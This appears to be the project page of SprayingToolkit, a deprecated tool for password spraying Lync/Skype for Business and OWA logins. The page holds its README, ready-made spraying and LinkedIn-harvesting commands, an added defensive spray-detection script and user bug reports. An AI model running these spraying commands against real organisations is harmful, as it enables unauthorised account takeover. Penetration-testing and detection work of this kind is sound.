sprayingtoolkit's Introduction

Deprecation Notice

This project is no longer maintained. The following alternative projects are better and actively maintained:

SprayingToolkit

Description

A set of Python scripts/utilities that tries to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient.

Installation

Install the pre-requisites with pip3 as follows:

sudo -H pip3 install -r requirements.txt

Or use a Python virtual environment if you don't want to install the packages globally.

Tool Overview

Atomizer

A blazing fast password sprayer for Lync/Skype For Business and OWA, built on Asyncio and Python 3.7

Usage

Usage:
    atomizer (lync|owa|imap) <target> <password> <userfile> [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> <passwordfile> <userfile> --interval <TIME> [--gchat <URL>] [--slack <URL>] [--targetPort PORT][--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --csvfile CSVFILE [--user-row-name NAME] [--pass-row-name NAME] [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --user-as-pass USERFILE [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --recon [--debug]
    atomizer -h | --help
    atomizer -v | --version

Arguments:
    target         target domain or url
    password       password to spray
    userfile       file containing usernames (one per line)
    passwordfile   file containing passwords (one per line)

Options:
    -h, --help               show this screen
    -v, --version            show version
    -c, --csvfile CSVFILE    csv file containing usernames and passwords
    -i, --interval TIME      spray at the specified interval [format: "H:M:S"]
    -t, --threads THREADS    number of concurrent threads to use [default: 3]
    -d, --debug              enable debug output
    -p, --targetPort PORT    target port of the IMAP server (IMAP only) [default: 993]
    --recon                  only collect info, don't password spray
    --gchat URL              gchat webhook url for notification
    --slack URL              slack webhook url for notification
    --user-row-name NAME     username row title in CSV file [default: Email Address]
    --pass-row-name NAME     password row title in CSV file [default: Password]
    --user-as-pass USERFILE  use the usernames in the specified file as the password (one per line)

Examples

./atomizer.py owa contoso.com 'Fall2018' emails.txt
./atomizer.py lync contoso.com 'Fall2018' emails.txt
./atomizer lync contoso.com --csvfile accounts.csv
./atomizer lync contoso.com --user-as-pass usernames.txt
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat <GCHAT_WEBHOOK_URL>
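Seen from the defender's side, the options above leave a recognisable shape in authentication logs: one source tries each account once or twice, fails almost every time, and repeats the round at a fixed interval. The following is an added example, not part of SprayingToolkit; the log line format, thresholds and function names are assumptions, and the sample data is constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format (constructed for this example):
#   2021-01-05T09:00:00Z src=203.0.113.7 user=alice@contoso.com result=FAIL
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)


def build_sample_log():
    """Constructed data: a spraying source, one noisy user, and a busy office NAT."""
    users = ["alice", "bob", "carol", "dave", "erin", "frank"]
    t0 = datetime(2021, 1, 5, 9, 0, 0)
    rows = []
    # Source A: one attempt per user, three rounds 45 minutes apart.
    for rnd in range(3):
        for i, u in enumerate(users):
            ok = rnd == 2 and u == "frank"
            rows.append((t0 + timedelta(minutes=45 * rnd, seconds=i), "203.0.113.7", u, ok))
    # Source B: a single user mistyping a password eight times (not a spray).
    for i in range(8):
        rows.append((t0 + timedelta(seconds=20 * i), "198.51.100.20", "bob", False))
    # Source C: many users behind one address, almost all logons succeed.
    for i, u in enumerate(users):
        rows.append((t0 + timedelta(seconds=30 * i), "192.0.2.10", u, u != "carol"))
    return [
        f"{ts:%Y-%m-%dT%H:%M:%SZ} src={src} user={u}@contoso.com result={'OK' if ok else 'FAIL'}"
        for ts, src, u, ok in rows
    ]


def parse(lines):
    """Return time-sorted (timestamp, source, user, result) tuples; skip malformed lines."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append((ts, m["src"], m["user"].lower(), m["result"]))
    return sorted(events)


def split_bursts(events, gap):
    """Group each source's events into bursts separated by more than `gap` of silence."""
    bursts = defaultdict(list)
    for ts, src, user, result in events:
        current = bursts[src]
        if current and ts - current[-1][-1][0] <= gap:
            current[-1].append((ts, user, result))
        else:
            current.append([(ts, user, result)])
    return bursts


def detect_spray(lines, min_users=5, max_per_user=2.0, min_fail_ratio=0.8,
                 gap=timedelta(minutes=5), jitter=60.0):
    """Flag sources whose bursts touch many accounts, few times each, mostly failing."""
    findings = []
    for src, bursts in sorted(split_bursts(parse(lines), gap).items()):
        sprays = []
        for burst in bursts:
            users = {user for _, user, _ in burst}
            fails = sum(1 for _, _, result in burst if result == "FAIL")
            if (len(users) >= min_users
                    and len(burst) / len(users) <= max_per_user
                    and fails / len(burst) >= min_fail_ratio):
                sprays.append(burst)
        if not sprays:
            continue
        starts = [burst[0][0] for burst in sprays]
        intervals = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
        findings.append({
            "source": src,
            "rounds": len(sprays),
            "intervals": intervals,
            # Near-constant spacing between rounds matches a scheduled interval.
            "periodic": len(intervals) >= 2 and max(intervals) - min(intervals) <= jitter,
            # Accounts that logged on successfully inside a spray round need review.
            "review_accounts": sorted({u for b in sprays for _, u, r in b if r == "OK"}),
        })
    return findings


if __name__ == "__main__":
    for finding in detect_spray(build_sample_log()):
        print(finding)
```

The failure-ratio check is what keeps a shared egress address with mostly successful logons out of the results, and the per-user cap separates spraying from repeated guessing against a single account.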

Vaporizer

A port of @OrOneEqualsOne's GatherContacts Burp extension to mitmproxy with some improvements.

Scrapes Google and Bing for LinkedIn profiles, automatically generates emails from the profile names using the specified pattern and performs password sprays in real-time.

(Built on top of Atomizer)

Examples

mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target=<domain or url to spray> --set password=password --set email_format='{f}.{last}'

By default email_format is set to {first}.{last} pattern and is not a required argument.

The domain parameter is the domain to use for generating emails from names; the target parameter is the domain or URL to password spray.

Install the mitmproxy cert, set the proxy in your browser, go to Google and/or Bing and search (make sure to include the /in):

site:linkedin.com/in "Target Company Name"

Emails will be dumped to emails.txt in the specified format, and passed to Atomizer for spraying.

Aerosol

Scrapes all text from the target website and sends it to AWS Comprehend for analysis to generate custom wordlists for password spraying.

Still a work in progress

Usage

mitmdump -s aerosol.py --set domain=domain.com

Spindrift

Converts names to Active Directory usernames (e.g. Alice Eve => CONTOSO\aeve)

Usage

Usage:
    spindrift [<file>] [--target TARGET | --domain DOMAIN] [--format FORMAT]

Arguments:
    file    file containing names, can also read from stdin

Options:
    --target TARGET   optional domain or url to retrieve the internal domain name from OWA
    --domain DOMAIN   manually specify the domain to append to each username
    --format FORMAT   username format [default: {f}{last}]

Examples

Reads names from STDIN, --domain is used to specify the domain manually:

cat names.txt | ./spindrift.py --domain CONTOSO

Reads names from names.txt, --target dynamically grabs the internal domain name from OWA (you can give it a domain or url)

./spindrift.py names.txt --target contoso.com

sprayingtoolkit's People

Contributors

0xflotus, alxbl, byt3bl33d3r, dave1840438, jeffmcjunkin, maxnad

sprayingtoolkit's Issues

Dumped 0 valid accounts to lync_valid_accounts.txt, when it actually found a valid cred

I notice that even if it found a valid credential, at the end it says Dump 0 Valid Accounts,
leading me to believe it didn't work, but I saw a green + at one point, scrolled up and saw I had a few valid creds.

Not sure if it changes anything, but it was a list of 5000 usernames.

Dumped 0 valid accounts to lync_valid_accounts.txt
python3.7 atomizer.py

atomizer - random behavior

Kali Linux 2020.4 fully patched.
Python 3.9.1+

./atomizer.py owa https://webmail.acme.org/ews/exchange.asmx /root/passwords.txt /root/users.txt --interval 00:00:01

Random behavior:

  1. Reports every password in my list as valid (only one should be valid).
  2. Test on a different server and it reports every password in my list as invalid (one should be valid).
  3. The output to the file is not in the same order of the passwords that are sprayed.

Inventory notification

SprayingToolkit has been inventoried on Rawsec's CyberSecurity Inventory.

https://inventory.rawsec.ml/tools.html#SprayingToolkit

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why should you care about being inventoried?

Mainly because this is giving visibility to your tool and improves its referencing.

Badges

The badge shows your community that you are inventoried. It looks good but also shows you care about your project, that your tool is referenced.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that Rawsec's CyberSecurity Inventory, but there are several styles available.

Want to thank us?

If you want to thank us, you can help make our open project better known by tweeting about it! For example: Twitter URL

So what?

That's all, this message is just to notify you if you care. Else you can close this issue.

OWA accounts with 2FA enabled report Invalid creds even when password is correct

I'm testing the tool against my organization email address, hosted on Office365.
I know the password is correct but SprayingToolkit reports:

[*] Trying to find autodiscover URL
[+] Using OWA autodiscover URL:...............
... OWA domain appears to be hosted on Office365
[-] Error parsing internal domain name using OWA. This usually means OWA is being hosted on-prem or the target has a hybrid AD deployment
Do some recon and pass the custom OWA URL as the target if you really want the internal domain name, password spraying can still continue though :)
Full error: Input seems to be a non-valid base64-encoded string: 'Basic Realm=""'

....(Invalid credentials)

If I disable 2FA, credentials are reported as correct.

Atomizer Fails - Sleep length must be non-negative

I've been experiencing a problem where atomizer.py crashes occasionally while sleeping until the next spray.

Traceback (most recent call last):pray
  File "atomizer.py", line 186, in <module>
    countdown_timer(*args['--interval'].split(':'))
  File "/opt/SprayingToolkit/core/utils/time.py", line 31, in countdown_timer
    time.sleep((target - now()).total_seconds())
ValueError: sleep length must be non-negative

The crashes happen at random intervals and don't seem to correlate to any specific time in the countdown. Sometimes it will count down successfully all the way and perform another spray, sometimes it will do so successfully many times, but sometimes it crashes.

This is on the latest version of SprayingToolkit, installed with pipenv. Ran after loading the virtual environment.

atomizer.py

Kali Linux 2020.4 fully patched
Python 3.9.1+

The output to the screen and file are not correct for SprayingToolkit/atomizer.py

./atomizer.py owa https://webmail.acme.org/ews/exchange.asmx /root/passwords.txt /root/users.txt
[*] Using ...
[+] Got internal domain ...
[*] Starting spray ...
[+] Found credentials: [email protected]:/root/passwords.txt
[+] Dumped 1 valid accounts to owa_valid_accounts.txt

cat owa_valid_accounts.txt
[email protected]:/root/passwords.txt

I would expect the output to be [email protected]:winter2021

Failed to read from csv

atomizer fails to read from --csvfile.

CSV File

email,password
[email protected],Password1
[email protected],Password2
[email protected],Password3

atomizer error

pentest/osint/SprayingToolkit/atomizer.py owa test.com --csvfile test-creds.csv --user-row-name email --pass-row-name password
[*] Trying to find autodiscover URL
[+] Using OWA autodiscover URL: None
[*] OWA domain appears to be hosted on Office365
[*] Using Office 365 autodiscover URL: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
[-] Error parsing internal domain name using OWA. This usually means OWA is being hosted on-prem or the target has a hybrid AD deployment
    Do some recon and pass the custom OWA URL as the target if you really want the internal domain name, password spraying can still continue though :)

    Full error: Invalid URL 'None': No schema supplied. Perhaps you meant http://None?

[*] Starting spray at 2019-11-14 10:57:43 UTC
Traceback (most recent call last):
  File "/pentest/osint/SprayingToolkit/atomizer.py", line 222, in <module>
    pass_row_name=args['--pass-row-name']
  File "/usr/lib/python3.7/asyncio/base_events.py", line 584, in run_until_complete
    return future.result()
  File "/pentest/osint/SprayingToolkit/atomizer.py", line 113, in atomize_csv
    for row in csvreader
  File "/pentest/osint/SprayingToolkit/atomizer.py", line 113, in <listcomp>
    for row in csvreader
KeyError: 'email'

Granted, these emails are all fake; but it should at least try to request them? I have also tried setting the column names to Email Address and Password. To no avail.

I am also running version 1.0.0dev.

Processing hangs/dies on larger input files

I have tried running atomizer.py several times and for input userfiles > 597, it starts behaving oddly.

  • For userfiles < 597, it appears to run and terminate as expected.
  • For userfiles > 597, it will process to around 597, then hang indefinitely.
  • For very large userfiles (>100000) it will process a few hundred then die. I am not sure what is causing the process to die; there is no error message. I have even enabled the "-d" flag to see if there were any debug messages of use. Nothing. I simply get the message "Killed".

This is the command line I have used (obviously I actually entered my correct <domain> and <password>).
python3.7 atomizer.py lync <domain> <password> --userfile users.txt

I have tried running this on both Kali Rolling 2018.3 and on Ubuntu 16.04.3 LTS. Same results on both.

An error occurred while installing brotlipy==0.7.0! Will try again.

Does anybody have the same trouble installing the toolkit?
When I cd to the SprayingToolkit directory and do a pipenv install I get:

pipenv install                                             ✔    130  13:15:19 
Installing dependencies from Pipfile.lock (7c127f)…
An error occurred while installing brotlipy==0.7.0! Will try again.
  🐍   ▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ 41/41 — 00:00:46
Installing initially–failed dependencies…
Collecting brotlipy==0.7.0 ▉▉▉▉▉▉▉▉▉▉ 0/1 — 00:00:00
  Using cached https://files.pythonhosted.org/packages/d9/91/bc79b88590e4f662bd40a55a2b6beb0f15da4726732efec5aa5a3763d856/brotlipy-0.7.0.tar.gz
Building wheels for collected packages: brotlipy
  Running setup.py bdist_wheel for brotlipy: started
  Running setup.py bdist_wheel for brotlipy: finished with status 'error'
  Complete output from command /root/.local/share/virtualenvs/SprayingToolkit-OCb3TDaP/bin/python3.7m -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-3neh2n4c/brotlipy/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" bdist_wheel -d /tmp/pip-wheel-satii7nn --python-tag cp37:
  running bdist_wheel
  running build
  running build_py
  creating build
  creating build/lib.linux-x86_64-3.7
  creating build/lib.linux-x86_64-3.7/brotli
  copying src/brotli/build.py -> build/lib.linux-x86_64-3.7/brotli
  copying src/brotli/__init__.py -> build/lib.linux-x86_64-3.7/brotli
  copying src/brotli/brotli.py -> build/lib.linux-x86_64-3.7/brotli
  warning: build_py: byte-compiling is disabled, skipping.
  
  running build_clib
  building 'libbrotli' library
  creating build/temp.linux-x86_64-3.7
  creating build/temp.linux-x86_64-3.7/libbrotli
  creating build/temp.linux-x86_64-3.7/libbrotli/common
  creating build/temp.linux-x86_64-3.7/libbrotli/dec
  creating build/temp.linux-x86_64-3.7/libbrotli/enc
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/common/dictionary.c -o build/temp.linux-x86_64-3.7/libbrotli/common/dictionary.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/dec/huffman.c -o build/temp.linux-x86_64-3.7/libbrotli/dec/huffman.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/dec/bit_reader.c -o build/temp.linux-x86_64-3.7/libbrotli/dec/bit_reader.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/dec/decode.c -o build/temp.linux-x86_64-3.7/libbrotli/dec/decode.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/dec/state.c -o build/temp.linux-x86_64-3.7/libbrotli/dec/state.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/backward_references.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/backward_references.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/backward_references_hq.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/backward_references_hq.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/bit_cost.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/bit_cost.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/block_splitter.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/block_splitter.o
  In file included from libbrotli/enc/./block_splitter.h:14,
                   from libbrotli/enc/block_splitter.c:9:
  libbrotli/enc/./block_splitter_inc.h: In function ‘SplitByteVectorLiteral’:
  libbrotli/enc/./block_splitter_inc.h:403:61: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
       double* insert_cost = BROTLI_ALLOC(m, double, data_size * num_histograms);
  libbrotli/enc/././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  libbrotli/enc/./block_splitter_inc.h:405:62: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
       uint8_t* switch_signal = BROTLI_ALLOC(m, uint8_t, length * bitmaplen);
  libbrotli/enc/././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  libbrotli/enc/./block_splitter_inc.h: In function ‘SplitByteVectorCommand’:
  libbrotli/enc/./block_splitter_inc.h:403:61: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
       double* insert_cost = BROTLI_ALLOC(m, double, data_size * num_histograms);
  libbrotli/enc/././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  libbrotli/enc/./block_splitter_inc.h:405:62: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
       uint8_t* switch_signal = BROTLI_ALLOC(m, uint8_t, length * bitmaplen);
  libbrotli/enc/././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  libbrotli/enc/./block_splitter_inc.h: In function ‘SplitByteVectorDistance’:
  libbrotli/enc/./block_splitter_inc.h:403:61: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
       double* insert_cost = BROTLI_ALLOC(m, double, data_size * num_histograms);
  libbrotli/enc/././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  libbrotli/enc/./block_splitter_inc.h:405:62: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
       uint8_t* switch_signal = BROTLI_ALLOC(m, uint8_t, length * bitmaplen);
  libbrotli/enc/././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/histogram.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/histogram.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/memory.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/memory.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/literal_cost.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/literal_cost.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/brotli_bit_stream.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/brotli_bit_stream.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/compress_fragment_two_pass.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/compress_fragment_two_pass.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/compress_fragment.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/compress_fragment.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/cluster.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/cluster.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/utf8_util.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/utf8_util.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/encode.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/encode.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/metablock.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/metablock.o
  In file included from libbrotli/enc/././block_splitter.h:14,
                   from libbrotli/enc/./metablock.h:14,
                   from libbrotli/enc/metablock.c:10:
  libbrotli/enc/metablock.c: In function ‘ContextBlockSplitterFinishBlock’:
  libbrotli/enc/metablock.c:279:45: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
           BROTLI_ALLOC(m, HistogramLiteral, 2 * num_contexts);
  libbrotli/enc/./././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/static_dict.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/static_dict.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/dictionary_hash.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/dictionary_hash.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/entropy_encode.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/entropy_encode.o
  x86_64-linux-gnu-gcc-ar rcs build/temp.linux-x86_64-3.7/liblibbrotli.a build/temp.linux-x86_64-3.7/libbrotli/common/dictionary.o build/temp.linux-x86_64-3.7/libbrotli/dec/huffman.o build/temp.linux-x86_64-3.7/libbrotli/dec/bit_reader.o build/temp.linux-x86_64-3.7/libbrotli/dec/decode.o build/temp.linux-x86_64-3.7/libbrotli/dec/state.o build/temp.linux-x86_64-3.7/libbrotli/enc/backward_references.o build/temp.linux-x86_64-3.7/libbrotli/enc/backward_references_hq.o build/temp.linux-x86_64-3.7/libbrotli/enc/bit_cost.o build/temp.linux-x86_64-3.7/libbrotli/enc/block_splitter.o build/temp.linux-x86_64-3.7/libbrotli/enc/histogram.o build/temp.linux-x86_64-3.7/libbrotli/enc/memory.o build/temp.linux-x86_64-3.7/libbrotli/enc/literal_cost.o build/temp.linux-x86_64-3.7/libbrotli/enc/brotli_bit_stream.o build/temp.linux-x86_64-3.7/libbrotli/enc/compress_fragment_two_pass.o build/temp.linux-x86_64-3.7/libbrotli/enc/compress_fragment.o build/temp.linux-x86_64-3.7/libbrotli/enc/cluster.o build/temp.linux-x86_64-3.7/libbrotli/enc/utf8_util.o build/temp.linux-x86_64-3.7/libbrotli/enc/encode.o build/temp.linux-x86_64-3.7/libbrotli/enc/metablock.o build/temp.linux-x86_64-3.7/libbrotli/enc/static_dict.o build/temp.linux-x86_64-3.7/libbrotli/enc/dictionary_hash.o build/temp.linux-x86_64-3.7/libbrotli/enc/entropy_encode.o
  running build_ext
  generating cffi module 'build/temp.linux-x86_64-3.7/_brotli.c'
  building '_brotli' extension
  creating build/temp.linux-x86_64-3.7/build
  creating build/temp.linux-x86_64-3.7/build/temp.linux-x86_64-3.7
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli -Ilibbrotli/include -I/usr/include/python3.7m -I/root/.local/share/virtualenvs/SprayingToolkit-OCb3TDaP/include/python3.7m -c build/temp.linux-x86_64-3.7/_brotli.c -o build/temp.linux-x86_64-3.7/build/temp.linux-x86_64-3.7/_brotli.o
  build/temp.linux-x86_64-3.7/_brotli.c:22:12: fatal error: pyconfig.h: No such file or directory
   #  include <pyconfig.h>
              ^~~~~~~~~~~~
  compilation terminated.
  error: command 'x86_64-linux-gnu-gcc' failed with exit status 1
  
  ----------------------------------------
  Running setup.py clean for brotlipy
Failed to build brotlipy
Installing collected packages: brotlipy
  Running setup.py install for brotlipy: started
    Running setup.py install for brotlipy: finished with status 'error'

Unsure if this is really an issue--I may just be doing it wrong

I tried to use the atomizer against a Windows 2016 server running a vanilla install of Exchange 2016.
The target I used was https://mail.my-domain.tld (where my-domain and tld were given the appropriate values for my setting).
Any username:password combination would yield "Found" because the get requests they generate give a 200 response, but none of them actually logged in.

I modified the code to do a post request appending /owa/auth.owa to the mail host url and provided username, password, destination, flags, and forcedownlevel parameter values.

Was I doing it wrong or does this make sense?
I don't see how I could use the tool as it is built to properly spray the https owa instance.

Atomizer is showing valid credentials when actually failing

The message returned by Lync sprayer is invalid in some scenarios where the following message is returned in the SOAP response for the authentication request:

AADSTS50034: The user account Microsoft.AzureAD.Telemetry.Diagnostics.PII does not exist in the <domain> directory. To sign into this application, the account must be added to the directory.

The tool actually prints "Found credentials:... " in that case.

atomizer feature user as a pass.

Hi mate,

Thanks for such a huge contribution as always! I've been thinking of implementing atomizer to do password attempts on a $user option.

It's fairly common we get a hit on user:user from time to time.

Is this something you are implementing in the near future?

Cheers

binascii.Error: Incorrect padding

Just trying this for the first time and I'm getting this error:

python3 atomizer.py owa domain.com Password1 --userfile users.txt --debug
MainThread urllib3.connectionpool: Starting new HTTPS connection (1): autodiscover.domain.com:443
MainThread urllib3.connectionpool: Starting new HTTP connection (1): autodiscover.domain.com:80
MainThread urllib3.connectionpool: http://autodiscover.domain.com:80 "GET /autodiscover/autodiscover.xml HTTP/1.1" 302 0
MainThread urllib3.connectionpool: Starting new HTTPS connection (1): autodiscover-s.outlook.com:443
MainThread urllib3.connectionpool: https://autodiscover-s.outlook.com:443 "GET /autodiscover/autodiscover.xml HTTP/1.1" 401 0
MainThread         owasprayer: [+] Using OWA autodiscover URL: http://autodiscover.domain.com/autodiscover/autodiscover.xml
